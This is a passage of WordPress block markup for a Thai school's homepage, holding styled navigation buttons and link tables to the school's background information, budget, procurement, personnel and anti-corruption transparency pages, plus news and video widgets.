{\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 